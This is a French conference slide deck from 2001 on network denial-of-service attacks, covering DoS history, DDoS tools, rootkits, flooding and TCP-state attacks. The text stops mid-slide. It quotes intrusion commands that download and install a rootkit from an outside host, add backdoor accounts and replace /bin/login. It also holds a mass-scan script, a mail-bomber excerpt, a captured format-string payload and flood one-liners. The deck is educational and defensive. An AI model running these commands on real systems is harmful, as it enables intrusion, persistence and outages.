%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% Présentation "Les dénis de service réseau" %%% 2001 (c) Stéphane Aubert - Hervé Schauer Consultants %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %deffont "standard" tfont "comic.ttf" %deffont "thick" tfont "arialb.ttf" %deffont "typewriter" xfont "courier new-bold-r", tfont "cour.ttf" %deffont "type2writer" xfont "arial narrow-bold-r" %deffont "def" tfont "comic.ttf", size 5, fore "lemon chiffon", vgap 40, prefix " " %deffont "code" tfont "courbd.ttf", size 3, fore "green", prefix " " %deffont "warn" tfont "verdana.ttf", fore "red", center, size 6 %default 1 area 90 90, leftfill, size 2, fore "gold", back "black", font "thick" %default 1 back "black" %default 2 size 7, vgap 10, prefix " " %default 3 size 2, bar "brown" 3, vgap 30, right, prefix "Stephane Aubert (c) Herve Schauer Consultants - 2001" %default 4 left, size 5, fore "lemon chiffon", vgap 40, prefix " ", font "standard" %tab 1 size 4, fore "lemon chiffon", vgap 40, prefix " ", icon arc "tomato" 40 %tab 2 size 4, fore "gold", vgap 20, prefix " ", icon delta3 "tomato" 40 %tab 3 size 3, fore "grey", vgap 20, prefix " ", icon box "grey" 40 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %nodefault %size 7, font "standard", fore "white", back "black" %vgap 30 %xsystem "pipes -geometry %100x30" %center, size 9 Les dénis de service réseau - JRES 2001 - %center, size 5, font "thick", fore "gold" Stéphane Aubert %fore "grey", size 3 %fore "gold", size 5 Hervé Schauer Consultants %fore "grey", size 3 %%%center, image "test.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Plan %vgap 1 %icon box "blue" 30 Introduction %icon box "blue" 30 Petit historique des DOS %icon box "blue" 30 Présentation de DDOS (DOS répartis) %icon box "blue" 30 Piratage de masse et RootKits %icon box "blue" 30 Flooding (inondation de paquets) %icon box "blue" 30 Dernières attaques contre TCP %icon box "blue" 30 Quelques éléments de réponse %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dénis de service Définitions (Petit Larousse 2000) : Déni : refus d'accorder ce qui est dû. Dénier : refuser absolument d'accorder. Pré-requis : IP - RFC 791 ICMP - RFC 777 TCP - RFC 793 UDP - RFC 768 Liens : Base de DOS : http://www.attrition.org/security/denial/ DDOS Dave : http://staff.washington.edu/dittrich/misc/ddos/ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Nuke - Avril 1992 icmp_unreach Octopus - Janvier 1996 while - connect Ping Of Death - Décembre 1996 AIX, Digital Unix, Linux, BSDi, OSF, SCO Exemple : ping -l 65510 linuxbox WinNuke - Juillet 1997 blue screen of death ou reboot Win95/NT "Out of Band" sur le port 139/tcp avec le bit URG et un mauvais pointeur d'urgence Smurf / Smurf pour bsd - Juillet 1997 Inondation de paquets http://www.quadrunner.com/~c-huegen/smurf.txt %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Jolt / Sping - Octobre 1997 multiple ping-of-death Land - Octobre 1997 Affecte Windows 95(OSR2), Windows NT 4.0, FreeBSD, HP-UX, OpenBSD, SunOS, IOS, ... Latierra - Octobre 1997 Plante Windows 95 et occupe 100% du CPU sur Windows NT 4.0sp3 Teardrop / Overdrop - Décembre 1997 Plante Linux (jusqu'au kernel 2.0.31), NT, 95(OSR) Bonk - Janvier 1998 Plante Win95(OSR2) patché et NT 4.0 Teardrop modifié avec frag_offset > header_length %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Newtear - Janvier 1998 Affecte NT4 patché et Win95 Boink - Janvier 1998 Bonk modifié Fraggle - Mars 1998 Inondation de paquets Variante de Smurf en UDP Nestea / Nestea2 - Avril 1998 Plante linux 2.0.* and 2.1.* et certains Windows Syndrop - Juin 1998 teardrop mais en tcp avec le bit syn et des champs invalides (numéro de sequence, taille de fenètre, ...) "freeze" NT4sp3 Un de mes préférés :) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Targa - Juin 1998 bonk / jolt / land / nestea / newtear / syndrop / teardrop / winnuke Snork - Septembre 1998 Tueur de Windows NT Envoi de paquet RPC (135/udp) de la part d'un autre NT Smack - Octobre 1998 Inondation de paquets icmp-unreachable aléatoires Bloque Windows, *bsd, Redhat, Slackware, ... Stream / Raped - Janvier 2000 Inondation de ACK avec adresses/numéros de séquence aléatoires Jolt2.c - Mai 2000 Bloque Firewall-1 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS (Distributed Denial of Service) %font "code", size 3 +--------+ +--------+ | client | | client | +--------+ +--------+ | | --+------+-------------+--------+---------+-- | | | +-----------+ +-----------+ +-----------+ | handler | | handler | | handler | +-----------+ +-----------+ +-----------+ | | | ---+------+-----+------------+-+----------+-------+----+-- | | | | | +-------+ +-------+ +-------+ +-------+ +-------+ | agent | | agent | | agent | | agent | | agent | +-------+ +-------+ +-------+ +-------+ +-------+ \\\ /// \\ //// \\\\ /// \\\ /// \\ //// \\\\ /// +-----------+ +-----------+ +-----------+ | broadcast | | broadcast | | broadcast | +-----------+ +-----------+ +-----------+ \\\ |||| /// \\\ vvvv /// \\\ +--------+ /// --> | Victim |<---- +--------+ %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Trinoo client -> handler(s): 27665/tcp handler -> agent(s): 27444/udp agent -> handler(s): 31335/udp Attaques Syn flood Icmp flood %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS TFN (Tribe Flood Network) client -> handler : de type shell sur un port tcp sur un port udp sur icmp (comme loki) telnet ssh handler -> agent: paquets icmp echo-reply Attaques UDP flood SYN flood ICMP flood Smurf %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS TFN2K client -> handler : comme TFN handler -> agent : via TCP, UDP, ICMP, ou les 3 de manière aléatoire Attaques UDP flood SYN flood ICMP flood Smurf %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Stacheldraht client -> handler(s): 16660/tcp handler <-> agent(s): 65000/tcp, icmp-echo-reply Attaques ICMP flood SYN flood UDP flood Smurf %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Shaft client -> handler(s): 20432/tcp handler -> agent(s): 18753/udp agent -> handler(s): 20433/udp Attaques ICMP flood SYN flood UDP flood %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Mstream client -> handler(s): 6723/tcp 15104/tcp 12754/tcp agent -> handler(s): 9325/udp 6838/udp handler -> agent(s): 7983/udp 10498/udp Attaques stream (ack flood) Autres DDOS trinity v3 (controle via irc et icq), omega, flitz, ... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Script de masse (Mass-Hack) Que cherchent ils ? les ports 98/tcp ;-) services rpc statd, cmsd, ttdbserverd, automountd les serveurs FTP msadcs.dll, unicode Comment ? http://packetstorm.decepticons.org/UNIX/scanners/cracker.tgz %font "code" #!/bin/sh echo "scanning $1 for open boxes" ./z0ne $1 >$1.hosts echo "done whoring hosts.. running strobe" ./strobe -i $1.hosts -p 111 -n 900 -o $1.temp echo "second pass complete now running em through mountd scanner" ./i.pl $1.temp echo "alldone" %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Script de masse luckgo : le script principal ./luckgo 12 20 pour lancer le scan sur la plage 12.20/16 (AT&T) pour trouver les ports 111/tcp ouverts luckscan-a : le scanner de classe A, B ou C provient de pscan-a à chaque port ouvert lance l'exploit luckstatdx luckstatdx : statd exploit provient de statdx publié dans Bugtraq exploite un format-string-bug dans rpc.statd sur redhat 6.x exécute : %font "code" cd /;uname -a; id wget -nd http://www.becys.org/xzibit.tar.gz tar -zxvf xzibit.tar.gz cd lamerk; ./install cd /; rm -rf lamerk xzibit.tar.gz %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Attaque massive (exemple) obtention d'un shell garder le shell %font "code" uname -a; pwd; who echo "xxx:xxx:xxx:xxx:::/bin/sh" >> /etc/passwd echo "xxx:xxx:xxx:xxx:xxx:xxx:::" >> /etc/shadow cd /tmp gcc xxx.c -o xxx cp /bin/login /bin/xcat cp xxx /bin/login rm xxx xxx.c %font "def" obtenir des outils %font "code" wget http://packetstorm.decepticons.org/opensec-exploits/ exploits/solaris/solaris7/automountd.tar.gz wget xxx.yyy.zzz/amdex.tgz gunzip amdex.tgz tar -xvf amdex.tar rm -rf amdex.tar %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Attaque massive (exemple) utiliser les outils %font "code" ./ps xxx 98 %fore "grey" $ strings ps | grep remotes echo "%s" >> ./remotes %fore "green" ./vuln remotes %fore "grey" $ strings vuln| egrep -i '(pro|wu)' Vulnerable FTP(pro) - %s Vulnerable FTP(wu) - %s:no directories ;( Vulnerable FTP(wu) - %s:%s Vulnerable FTP(wu) - %s:/%s wu-2.4.2-academ[BETA-18](1) ProFTPD 1.2.0pre3 ProFTPD 1.2.0pre2 ProFTPD 1.2.0pre1 %fore "green" ./amdexa xxx.yyy.zzz.ttt etc. %font "def" patcher %font "code" wget ftp://updates.redhat.com/6.0/i386/ am-utils-6.0.1s11-1.6.0.i386.rpm rpm -Uvh am-utils-6.0.1s11-1.6.0.i386.rpm & rm -rf am-utils-6.0.1s11-1.6.0.i386.rpm %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Les rootkits Exemples : t0rn kit knark, adore, all-root, rial lrk3, lrk4, lrk5, lrk6 Solaris rootkit FreeBSD rootkit Ambient's Rootkit for Linux (ARK) Ramen, Lion Worm. rh[67]-shaper, RSHA, Romanian rootkit, RK17, ... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit http://packetstorm.decepticons.org/UNIX/penetration/rootkits/tk.tgz Quelques fichiers modifiés %font "code" -rwxr-xr-x 1 root root 22460 Mar 8 2000 /usr/bin/du -rwxr-xr-x 1 root root 57452 Feb 2 2000 /usr/bin/find -rwxr-xr-x 1 root root 32728 Mar 7 2000 /sbin/ifconfig -rwxr-xr-x 1 root root 6408 Feb 11 2000 /usr/sbin/in.fingerd -r-sr-xr-x 1 root root 20452 Feb 26 04:01 /bin/login -rwxr-xr-x 1 root root 39484 Mar 8 2000 /bin/ls -rwxr-xr-x 1 root root 53364 Mar 7 2000 /bin/netstat -rwxr-xr-x 1 root root 31336 Feb 26 12:07 /bin/ps -rwxr-xr-x 1 root root 266140 Mar 7 2000 /usr/bin/top %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit certains fichiers de torn %font "code", size 2 -rw-r--r-- 1 root ftp 28 Feb 26 04:01 /etc/ttyhash -rw-r--r-- 1 root ftp 27 Feb 26 04:01 /usr/src/.puta/.1addr -rw-r--r-- 1 root ftp 72 Feb 26 04:01 /usr/src/.puta/.1file -rw-r--r-- 1 root ftp 21 Feb 26 04:01 /usr/src/.puta/.1logz -rw-r--r-- 1 root ftp 38 Feb 26 04:01 /usr/src/.puta/.1proc -rwxr-xr-x 1 root root 6948 Aug 23 2000 /usr/src/.puta/t0rns -rwxr-xr-x 1 root root 7578 Aug 21 2000 /usr/src/.puta/t0rnp -rwxr-xr-x 1 root root 1345 Sep 9 1999 /usr/src/.puta/t0rnsb -rw-r--r-- 1 root ftp 609461 Feb 27 18:31 /usr/src/.puta/system -rw-r--r-- 1 root bin 2125 Feb 25 23:11 /usr/src/.puta/bc.c drwxrwxr-x 2 1000 1000 4096 Feb 27 13:30 /usr/src/.puta/grabbb -rw-r--r-- 1 root bin 6379 Dec 31 1999 /usr/src/.puta/grabbb-0.1.0.tar.gz drwx------ 3 1001 1001 4096 Feb 27 00:06 /usr/src/.puta/nmap-1.49 -rw-r--r-- 1 root bin 219155 Aug 16 1999 /usr/src/.puta/nmap.1.49.tar.gz -rwxr-xr-x 1 root bin 22850 Feb 26 23:35 /usr/src/.puta/smurf5 -rw-r--r-- 1 root ftp 499 Feb 26 04:01 /usr/info/.t0rn/shdcf -rwxr-xr-x 1 root root 524 Mar 13 2000 /usr/info/.t0rn/shhk -rwxr-xr-x 1 root root 328 Mar 13 2000 /usr/info/.t0rn/shhk.pub -rwxr-xr-x 1 root root 512 Mar 1 10:15 /usr/info/.t0rn/shrs %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit fichier du pirate dans /var/tmp/ %font "code" -rw-r--r-- 1 root bin 730 Feb 28 17:13 b -rw-r--r-- 1 root root 3350 Feb 27 15:38 bc.c -rw-r--r-- 1 root root 1736235 Feb 27 17:36 bccccc -rw------- 1 root root 798720 Feb 27 21:43 core drwxrwxr-x 2 1000 1000 1024 Feb 28 11:42 grabbb -rw-r--r-- 1 root root 6379 Feb 28 11:42 grabbb-0.1.0.tar.gz -rwxr-xr-x 1 root bin 22849 Feb 27 10:19 smurf5 -rw-r--r-- 1 root root 50792 Feb 28 11:46 wuftpd2600.c %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit backdoor Les lignes suivantes sont ajoutées à la fin du fichier /etc/rc.sysinit # Name Server Cache Daemon.. /usr/sbin/nscd -q nscd est ici un serveur SSHD. Ce serveur sshd utilisait le port 48863/tcp. L'accès root est autorisé :) ainsi que le forwarding X11. %font "code" Port 48863 ListenAddress 0.0.0.0 HostKey /usr/info/.t0rn/shhk RandomSeed /usr/info/.t0rn/shrs ... %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rn Sniffer le fichier t0rns est un sniffer (linsniff 0.666) Le sniffer a capturé une autre attaque par format-string sur ce serveur %font "code", size 2 ============================================================ Time: Mon Feb 26 19:32:53 Size: 1941 Path: xxx.yyy.zzz.ttt => [rooted-linux-box] [21] ------------------------------------------------------------ [p[e[fa[faUSER ftp[fPASS mozilla@[fSITE EXEC %020d|%.f%.f|[1f[TfSITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% .f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit Divers les fichiers bc* contiennent plus de 246 574 adresses de broadcast fichier core présent, créé par la commande ping ping -f 206.252.192.195 -s 650000 Cette adresse correspond au serveur : irc.stealth.net. grabbb -a xxx.yyy.0.0 -b xxx.yyy.255.255 21 scnanned scnanned contient les bannières de 1349 serveurs FTP dans la classe B xxx.yyy. %font "code" xxx.yyy.zzz.ttt:21: 220 XXXXXXX FTP server (Version wu-2.6.0(1) xxx.yyy.zzz.ttt:21: 220 XXXXXXX Microsoft FTP Service (Version 4.0). xxx.yyy.zzz.ttt:21: 220 XXXXXXX FTP server (Version wu-2.5.0(1) %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Plan %vgap 1 %icon box "blue" 30, fore "grey25" Introduction %icon box "blue" 30 Petit historique des DOS %icon box "blue" 30 Présentation de DDOS (DOS répartis) %icon box "blue" 30 Piratage de masse et RootKits %icon box "blue" 30, fore "white" Flooding (inondation de paquets) %icon box "blue" 30 Dernières attaques contre TCP %icon box "blue" 30 Quelques éléments de réponse %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" C'est l'inondation. Avec quoi ? des paquets ICMP ou UDP ou IGMP ou ... des connexions TCP des paquets IP aléatoires des fragments des mails (mail-bombing) des requêtes DNS etc. etc. etc. Est-ce difficile à mettre en oeuvre ? %font "code" ping -f -s while : ; do telnet & done %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" Mail bombing exemple : anonbomb.pl %font "code", size 2 @re = ("","","","","","","Re: ","Re: ","Re: ","Fw: ","Ad: ","Fwd: "); @sub2 = ("","Information","Info","Hello","Hi","Hiya","Yo","Registration", "Registering","Order","Ordering","Oi","Idea","Idea!","ISP","Internet Access", "Payment","Credit-Card","admin","Winning","Winnings","Compo","Competiton", "Howdy","Stuff","Fault","Faulty Order","Root","Hacking","Internet Abuse", "Mail Servers","Mailbombing....","Mailbomb","Help!","I'm Stuck","Computer Games", "Free Computer Games","Free Internet Access","0800","France","Holiday","French", ... $rep = $re[rand(@re)]; $subj1 = $sub1[rand(@sub1)]; $subj2 = $sub2[rand(@sub2)]; $subject = $rep . $subj1 . $subj2; $smtp -> mail($ENV{USER}); $smtp -> to ($to); $smtp -> data(); $smtp -> datasend("From: $from2 ($from)\n"); $smtp -> datasend("Reply-To: $from2\n"); $smtp -> datasend("To: $to (Mailing List Entry\: $key)\n"); $smtp -> datasend("Subject: $subject\n"); $smtp -> datasend("Date: Wed, 1 Jan 2039 00:00:01 -0000\n"); %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" Smurf %font "code" +---------+ | agent | +---------+ %fore "yellow" ICMP | %cont, fore "green" | %fore "yellow" from: victime | %cont, fore "green" | %fore "yellow" to: broadcast | %cont, fore "green" | %cont, fore "green" +---------+ %fore "yellow" | %cont,fore "green" | %cont,fore "red" +--------------> %cont,fore "green" | victime | %fore "yellow" | %cont,fore "green" | %cont,fore "red" | N fois %cont,fore "green" +---------+ +---------+ | routeur | +---------+ %fore "yellow" | %cont,fore "green" | %cont,fore "red" | %fore "yellow" v %cont,fore "green" | %cont,fore "red" ^ %fore "green" +------+-- %cont, fore "red" | %cont, fore "green" ---------+-------------------+ | %cont, fore "red" | %cont, fore "green" | | | %cont, fore "red" +------+------------+------------+ %cont, fore "green" | | %cont, fore "red" | %cont, fore "green" | %cont, fore "red" | | %cont, fore "green" | %fore "green" +-----------+ +-----------+ +-----------+ | machine | | machine | | machine | +-----------+ +-----------+ +-----------+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Flooding (exemples d'outils) Smurf papasmurf.c IP-bomber ipbomb targa3 isic ACK-storm Stream2 1 SYN + ACK-storm SYN-flood Neptune (Phrack48-13 - route - Juin 1996) le premier (?) Orgasm Scan de port + SYN-flood sur les ports ouverts synk4 il marche bien synk5 vu sur des machines piratées %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Flooding (exemples d'outils) DNS-flood ddnsf Sur différentes machines : ./DDNSF_server & Sur un client : ./DDNSF_client start zombie.txt Résultat : Plusieurs :) requêtes DNS incorrectes depuis des adresses IP usurpées. Contre les IDS IDSwakeup 82 000 alertes générées dans ISS RealSecure (IDnet) Envoie des fausses attaques avec des TTL courts. stick Lecture des fichiers de configuration de SNORT Etc. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Les anciens outils paralyze3 connect() flood : état ESTABLISHED synk4 SYN flood : état SYN_RCVD Les nouveaux outils 3wahas de Teso (http://teso.scene.at/) le premier (?), écrit sur le ccc camp '99 (syn syn|ack ack) flood pour passer outre les syn-cookies netkill (Stanislav Shalunov - shalunov@att.com) (syn syn|ack ack) + HTTP get + fermer le descripteur de fichier naptha (Robert Keyes - Bindview - 30 nov. 2000) principalement (syn syn|ack fin|ack) avec de faux paquets ARP shutup.pl / just_shutup.pl /shutup.c (Stéphane Aubert - HSC) utilise un filtre IP (ipfilter, ipchains, ...) et différents modes combinables : (syn syn|ack ack) (syn syn|ack fin|ack) (syn syn|ack ack psh|ack) (syn syn|ack ack fin|ack) Option TTL court (pour filtre et firewall) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP %font "code", size 2 %fore "yellow" RFC 793 - TCP Connection State Diagram - Figure 6. %fore "green" +---------+ ---------\ active OPEN | CLOSED | \ ----------- +---------+<---------\ \ create TCB | ^ \ \ snd SYN passive OPEN | | CLOSE \ \ ------------ | | ---------- \ \ create TCB | | delete TCB \ \ %cont, fore "cyan", size 2 Normal : %fore "green", size 2 V | \ \ +---------+ CLOSE | \ %cont, fore "cyan", size 2 Client ------[ SYN ]-----> Serveur %fore "green", size 2 | LISTEN | ---------- | | +---------+ delete TCB | | %cont, fore "cyan", size 2 Client <---[ SYN|ACK ]---- Serveur %fore "green", size 2 rcv SYN | | SEND | | ----------- | | ------- | V %cont, fore "cyan", size 2 Client ------[ ACK ]-----> Serveur %fore "green", size 2 +---------+ snd SYN,ACK / \ snd SYN +---------+ | |<----------------- ------------------>| | %cont, fore "red", size 2 Naptha : %fore "green", size 2 | SYN | rcv SYN | SYN | | RCVD |<-----------------------------------------------| SENT | %cont, fore "red", size 2 Client ------[ SYN ]-----> Serveur %fore "green", size 2 | | snd ACK | | | |------------------ -------------------| | %cont, fore "red", size 2 Client <---[ SYN|ACK ]---- Serveur %fore "green", size 2 +---------+ rcv ACK of SYN \ / rcv SYN,ACK +---------+ | -------------- | | ----------- %cont, fore "red", size 2 Client ----[ FIN|ACK ]---> Serveur %fore "green", size 2 | x | | snd ACK | V V | CLOSE +---------+ | ------- | ESTAB | | snd FIN +---------+ | CLOSE | | rcv FIN V ------- | | ------- +---------+ snd FIN / \ snd ACK +---------+ | FIN |<----------------- ------------------>| CLOSE | | WAIT-1 |------------------ | WAIT | +---------+ rcv FIN \ +---------+ | rcv ACK of FIN ------- | CLOSE | | -------------- snd ACK | ------- | V x V snd FIN V +---------+ +---------+ +---------+ |FINWAIT-2| | CLOSING | | LAST-ACK| +---------+ +---------+ +---------+ | rcv ACK of FIN | rcv ACK of FIN | | rcv FIN -------------- | Timeout=2MSL -------------- | | ------- x V ------------ x V \ snd ACK +---------+delete TCB +---------+ ------------------------>|TIME WAIT|------------------>| CLOSED | +---------+ +---------+ %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Présentation de tcp RFC 793 Stevens - Volume 1 Comment cela fonctionne ? Stevens - Volume 2 less /usr/src/sys/netinet/tcp_input.c Exemple : %font "code" /* * Ack processing. */ switch (tp->t_state) { /* * In SYN_RECEIVED state if the ack ACKs our SYN then enter * ESTABLISHED state and continue processing, otherwise * send an RST. */ case TCPS_SYN_RECEIVED: if (SEQ_GT(tp->snd_una, th->th_ack) || SEQ_GT(th->th_ack, tp->snd_max)) goto dropwithreset; tcpstat.tcps_connects++; soisconnected(so); tcp_established(tp); %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples d'utilisation de Shutup v0.5 shutup -d -p %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime %font "def" shutup -d -p -n %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client ------[ FIN|ACK ]-----> Victime %font "def" shutup -d -p -f %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime Client ------[ FIN|ACK ]-----> Victime %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples d'utilisation de Shutup v0.5 shutup -d -p -b %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client ------[ FIN|ACK ]-----> Victime %font "def" shutup -d -p -t %font "code" Client --------[ SYN ]-------------> Victime Client <-----[ SYN|ACK ]------------ Victime Client --------[ ACK ]------->| Victime | TTL court %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples rééls d'utilisation de Shutup v0.5 %font "code", size 2 # ./shutup -d groar -p 80 -b -f --== shutup v0.5 - sa/hsc ==-- == target: groar [192.70.106.66] == interface: ep0 == local ip: 192.70.106.82 08:42:02.270273 [SA] 192.70.106.66:80 -> 192.70.106.82:42317 ==> Ack + Fin|Ack 08:42:02.270337 [SA] 192.70.106.66:80 -> 192.70.106.82:63231 ==> Fin|Ack 08:42:02.270399 [SA] 192.70.106.66:80 -> 192.70.106.82:44523 ==> Ack + Fin|Ack 08:42:02.270459 [SA] 192.70.106.66:80 -> 192.70.106.82:16845 ==> Fin|Ack 08:42:02.270522 [SA] 192.70.106.66:80 -> 192.70.106.82:5208 ==> Ack + Fin|Ack 08:42:02.270597 [SA] 192.70.106.66:80 -> 192.70.106.82:23311 ==> Fin|Ack 08:42:02.270658 [SA] 192.70.106.66:80 -> 192.70.106.82:4306 ==> Ack + Fin|Ack Ou encore : 09:06:12.700343 [SA] 192.70.106.66:80 -> 192.70.106.82:26231 ==> Ack 09:06:12.710345 [SA] 192.70.106.66:80 -> 192.70.106.82:37729 ==> Ack 09:06:12.720341 [SA] 192.70.106.66:80 -> 192.70.106.82:1983 ==> Ack 09:06:12.730342 [SA] 192.70.106.66:80 -> 192.70.106.82:35187 ==> Ack 09:06:12.740337 [SA] 192.70.106.66:80 -> 192.70.106.82:49277 ==> Ack 09:06:12.750346 [SA] 192.70.106.66:80 -> 192.70.106.82:33695 ==> Ack %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Contre linux 2.2.17 %font "code" LAST_ACK SYN_RECV -------- -------- Jusque là tout va bien : Tue Mar 20 11:48:22 CET 2001 17326 2 Tue Mar 20 11:48:36 CET 2001 17816 2 Tue Mar 20 11:48:49 CET 2001 18195 124 Tue Mar 20 11:49:04 CET 2001 18382 127 A partir de là, rien ne va plus : Tue Mar 20 11:49:19 CET 2001 18401 129 Tue Mar 20 11:49:33 CET 2001 18401 129 # ssh ducamp@itesec socket: No buffer space available socket: No buffer space available socket: No buffer space available socket: No buffer space available Secure connection to itesec refused. Ca ne va toujours pas : Tue Mar 20 11:55:50 CET 2001 18401 129 Tue Mar 20 11:56:05 CET 2001 18401 43 %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Contre linux 2.2.17 %font "code" LAST_ACK SYN_RECV -------- -------- Le début de la libération : Tue Mar 20 12:04:15 CET 2001 18401 Tue Mar 20 12:04:29 CET 2001 18189 Pour tout libérer, 